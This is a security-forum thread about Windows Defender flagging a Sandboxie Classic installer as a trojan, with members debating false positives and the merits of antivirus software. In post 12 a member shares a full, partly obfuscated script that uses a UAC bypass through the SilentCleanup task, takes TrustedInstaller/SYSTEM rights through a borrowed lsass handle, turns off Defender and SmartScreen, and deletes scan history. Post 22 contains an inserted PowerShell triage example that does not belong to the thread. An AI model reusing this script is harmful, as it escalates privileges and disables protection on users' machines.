Trojans identified by MS Defender in Sandboxie Classic exe

Discussion in 'Sandboxie (SBIE Open Source) Plus & Classic' started by WSC3, Feb 19, 2021.

  1. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    My Windows 10 Defender is now suddenly flagging my copies of “sandboxie-Classic-x64-v5.46.5.exe” as loaded with Trojans and backdoor viruses. I tried downloading a new copy and Defender quarantined and deleted it immediately. When I dial to the folder where I had a previous copy, similar alarms were activated and the file removed.

    The following were identified:

    Backdoor:Win32/Bladabindi!ml

    Trojan:Win32/Wacatac.DF!ml


    What’s going on? I can’t believe I'm the only one to discover these invaders to your software. I just installed this on my new PC about a month ago, so this is a recent thing.

    Thanks.

    WSC3
     
  2. A_mouse

    A_mouse Registered Member

    Joined:
    Jul 29, 2019
    Posts:
    72
    Location:
    A field
    What does VirusTotal show ?
     
  3. SeriousHoax

    SeriousHoax Registered Member

    Joined:
    Mar 27, 2019
    Posts:
    29
    Location:
    Bangladesh
    You're using an older version. Install the latest stable version and check again:
    https://github.com/sandboxie-plus/Sandboxie/releases/download/0.6.7/Sandboxie-Classic-x64-v5.47.1.exe
     
    Last edited by a moderator: Feb 19, 2021
  4. A_mouse

    A_mouse Registered Member

    Joined:
    Jul 29, 2019
    Posts:
    72
    Location:
    A field
    Yeah I was going to suggest getting the latest build instead.

    I just checked that older build in VT, and no decent AV detect it as bad, so just assume yet another Defender false positive.
    ~ VT results removed
     
    Last edited: Feb 19, 2021
  5. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,299
    Location:
    UK
    I downloaded and installed 5.48 classic over the top of previous build on a machine this morning.
    Defender flagged it as Trojan:Win32/Wacatac.DF!ml and I had to tell it to allow it on my machine instead of quarantining it.

    As you know we cannot link to VT results on the forum, however Defender does not show it as detected now on VT.
    I think it may have been a FP from a definition update.
     
  6. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    Where do I find that?
     
  7. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    That downloaded without incident. So why would Defender cite specific viruses identified if they don't exist? What did it see and misidentify as an intruder?
     
  8. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    Windows 10 Defender is a Trojan and a Backdoor itself, it allows MSFT to mess with your system and delete your files on their whim.
     
  9. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    +1
    Yes. Someone stands up to speak the truth, finally.
     
  10. imdb

    imdb Registered Member

    Joined:
    Nov 2, 2011
    Posts:
    3,031
    -1.
    i never had any issues with defender. it's pretty light too.
     
  11. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    That does not mean others haven't, and no signature based anti malware fool is light, by its nature, never.

    Also frankly signature based anti malware fools are unreliable and often ineffective against 0-day threats, and they are mostly useless in case of targeted attacks.

    To get decent detection rates they often employ a carpet bombing approach flagging everything they don't know as threats.

    It's pretty much useless by this point, even large companies have issues with that idiocy,
    now VT is even curating a software white list for large companies:
    https://www.cio.com/article/2883694...-plaguing-antivirus-and-software-vendors.html

    Read the rant of another developer here:
    https://weblog.west-wind.com/posts/2016/oct/05/dealing-with-antivirus-false-positives


    The first thing I do on a PC after installing Windows is to thoroughly disable or entirely remove Windows Defender.
     
  12. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    +1
    I do the same thing every time on my own pcs, at times on others pcs.

    I make use of this script to disable WD

    Code:
    @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
    set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
    
    ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
    if ($env:1 -ne 6 -and $env:1 -ne 7) {
      $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
      if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
    }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
    
    ## Comment to not hide per-user toggle notifications
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
    sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
    
    ## Cascade elevation
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## Reload from volatile registry as needed
    $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
    $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
    $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; break
    }
    
    ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
    }
    
    ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
    if ($u -eq 2) {
      $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
      1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
      $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
      nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
      $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
      $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
      $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
      $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      net1 start windefend
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      kill -Name MpCmdRun -Force -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
    sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
    sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
    rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
    sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
    rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
    sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
    rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
    sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
    rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
    sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
    rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close windows built-in lame uac bpass and/or reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
    #-_-# hybrid script, can be pasted directly into powershell console
    
     
  13. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    So what's the anti-virus of choice.....?
     
  14. imdb

    imdb Registered Member

    Joined:
    Nov 2, 2011
    Posts:
    3,031
    sure.
    and i'm aware of those facts and the limitations of signature based solutions. but i don't see any need to disable defender. i'm running it on a vm on a host protected by a 3rd party solution, Kaspersky is. and i also think that no product/approach is perfect at the end of the day. and to each his own.
     
    Last edited: Feb 19, 2021
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,396
    Location:
    U.S.A.
    Article is 6 years old. The other one is 5 years old. A lot has changed in this regard in the last 5-6 years with the major AV vendors. One being the AV labs dinging them for FPs on the comparative tests. I would contend the opposite is true currently. That their FP hesitancy is allowing stuff to go undetected.
     
    Last edited: Feb 19, 2021
  16. digmor crusher

    digmor crusher Registered Member

    Joined:
    Jul 6, 2012
    Posts:
    908
    Location:
    Canada
    Well you're not going to find an AV that works finer on W10 than Defender. IMO Zero 3rd party conflicts.
     
  17. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,002
    That's simply not true. There are several antiviruses that are usually light enough that there is little difference in performance compared to running no antivirus, even on low-end hardware. Of course, this isn't true for all antiviruses.
    I use a third party antivirus and I never have any conflicts, even when going weeks between rebooting. In my experience, while you can have problems when using third party antiviruses, you're more likely to not have problems than have them.
     
  18. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    3,976
    Chinese power can't be wrong - including their own malware bombs :isay:
    if you have proven evidence you probably should share with us, otherwise it's totally BS.

    VT belongs to google and it has paid participants no one ever has read about. There can't be another explanation for the list, and it's wise to remove vt results here because those are not really for good. VT is spreading its results to all competitors, and it belongs to them to investigate or drop.

    For sandboxie - how long do you have issues now sandboxie being flagged as malware from several antiviruses? I would say: too long.

    I don't have doubt on your work, but if you won't change anything they probably won't change anything either, why should they?
     
  19. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    8,912
    Location:
    Among the gum trees
    Yeah, I call BS.
     
  20. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,433
    Location:
    The Netherlands
    Aren't you being a bit overly dramatic? I agree that false positives are annoying as hell, but so far I haven't encountered any with Win Defender. And as Stapp already said, I believe you can simply whitelist wrongly flagged files.
     
  21. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    Well windows defender has by default this feature enabled where it sends "suspicious" files to MSFT for analysis, those files may be yours and may contain private information. They don't even make a secret out of that.

    And when it finds a suspicious file instead of only blocking access it deletes it without asking, that's IMHO outright criminal malicious behavior.
    No application should delete or move files without being ordered by the user to do so, unless it created those files itself!

    How would you feel about Internet Explorer deleting Firefox binaries, for example?

    Or Defender mistaking your unbacked-up doctoral thesis as malware and preemptively deleting it?

    Or the police shooting some one in the back that they see running and looking suspicious without asking questions?


    On my computer no software should delete/move files (which do not belong to it) never, NEVER EVER!


    To me such sort of behavior is absolutely undesired and should never be deemed acceptable, no messing with 3rd party files, and no uploads to any corporate overlords without an express user permission.
    Doing so is behavior that is not different from that of regular Trojans.


    To protect a user from threats it would be perfectly sufficient to block access to the file in question and display a warning message, deleting files is simply an unacceptable overreach.



    Because they broke it!
    You don't ask the victim of a crime to do something against it, you just drop the hammer on the perpetrators.
     
    Last edited: Feb 20, 2021
  22. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,299
    Location:
    UK
    When I go to install Sbie and Defender sees it as a threat, it brings up a notification in my taskbar which I cannot miss it because I am looking at the screen installing a software.
    I click on the Defender/Security Center notification and I am taken to the screen which tells me what it has found (Trojan)
    I then use the drop down menu to tell it what to do. In my case I chose 'allow on this device'
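    The posts above suggest two things for a flagged installer: look the file up on VirusTotal, and tell Defender to allow it if it is a false positive. The following PowerShell snippet is an added example and is not code from this thread, from Sandboxie or from Microsoft; it shows the same triage done from an elevated console with Defender's built-in cmdlets and MpCmdRun.exe: read the detection record, hash and signature-check the file so the hash can be compared against the publisher's checksum or searched on VirusTotal, restore it from quarantine, and add an exclusion for that one file rather than the whole Downloads folder. The `$Installer` path and the threat name passed to `-Restore` are assumptions taken from the thread; replace them with what Defender actually reported on your machine.

```powershell
# Added example: triage a Windows Defender detection on a downloaded installer.
# Run from an elevated PowerShell. Path and threat name are assumptions from the thread.
$Installer = "$env:USERPROFILE\Downloads\Sandboxie-Classic-x64-v5.47.1.exe"
$MpCmdRun  = "$env:ProgramFiles\Windows Defender\MpCmdRun.exe"

# 1. What did Defender detect, on which file, and did its action succeed?
Get-MpThreatDetection |
    Where-Object { $_.Resources -match 'Sandboxie' } |
    Select-Object DetectionID, InitialDetectionTime, ProcessName, ActionSuccess, Resources

# Threat names still considered active (the "!ml" suffix marks a machine-learning verdict)
Get-MpThreat | Select-Object ThreatID, ThreatName, SeverityID, IsActive

# 2. Record the SHA-256 of the exact file you have; compare it with the publisher's
#    checksum, or search the hash on VirusTotal instead of uploading the binary.
Get-FileHash -Algorithm SHA256 -LiteralPath $Installer | Select-Object Hash, Path

# 3. Check the Authenticode signature. A valid signature from the expected publisher on a
#    "!ml" hit points to a false positive; an unsigned or tampered file deserves more scrutiny.
Get-AuthenticodeSignature -LiteralPath $Installer |
    Select-Object Status, StatusMessage, @{ n = 'Signer'; e = { $_.SignerCertificate.Subject } }

# 4. If the file was quarantined, list quarantine and restore it to its original folder.
& $MpCmdRun -Restore -ListAll
& $MpCmdRun -Restore -Name 'Trojan:Win32/Wacatac.DF!ml' -Path "$env:USERPROFILE\Downloads"

# 5. Only after steps 2-3 check out: exclude that single file, not a whole directory.
Add-MpPreference -ExclusionPath $Installer
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
```

`Remove-MpPreference -ExclusionPath $Installer` reverts step 5 once the installer has run. Keeping the exclusion to one file matters because a folder-wide exclusion on Downloads would silence Defender for everything saved there later.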
     
  23. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    I concur, 100% :thumb:
     
  24. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    @stapp I had enough complaints of users where after allowing, a few reboots later it just deleted the driver despite it being earlier allowed.
    Might be that users have updated it in the meantime, but still, deleting files without permission is simply unacceptable.
     
  25. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    406
    Location:
    Austria
    Theoretically yes. In practice it has happened to me that files had simply disappeared because Windows Defender regarded them as malicious.

    As far as I remember, especially in the way mentioned by David:
     